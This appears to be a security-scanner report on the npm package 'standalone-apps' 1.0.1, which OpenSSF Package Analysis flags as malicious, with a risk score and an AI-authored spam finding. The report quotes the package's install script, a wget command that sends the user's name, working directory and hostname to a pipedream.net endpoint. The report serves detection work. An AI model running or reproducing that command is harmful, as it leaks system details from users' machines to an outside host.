standalone-apps @1.0.1
Maintainers
Risk Dispositions (1 applicable to this version, 0 other)
Accepted rules are downgraded to INFO on future analyses; rejected rules escalate to CRITICAL.
| Rule | Source | Disposition | Author | Reason | |
|---|---|---|---|---|---|
bogus-package |
bogus-package | reject | AI | AI (bogus-package): Package is effectively empty with no code, no metadata, and a zero-history publisher — spam indicators generalize across versions. |
SAST Findings (3)
--- _-= Per source details. Do not edit below this line.=-_ ## Source: ossf-package-analysis (3fb70e7334d6b608e0f9f3f3a8417390f47fa5b57d497dced9fc924b20181c06) The OpenSSF Package Analysis project identified 'standalone-apps' @ 1.0.1 (npm) as malicious. It is considered malicious because: - The package communicates with a domain associated with malicious activity. - The package executes one or more commands associated with malicious behavior.
Script: wget --quiet "http://eodxy50gl486xrx.m.pipedream.net/?user=$(whoami)&path=$(pwd)&hostname=$(hostname)"
Package was published without Sigstore provenance. Only ~12% of npm packages have provenance, so this is common but not ideal.
Review Summary
Risk score: 81. Findings: 1 critical (+40), 1 high (+25), 1 medium (+10), 2 low (+6).
Published to npm: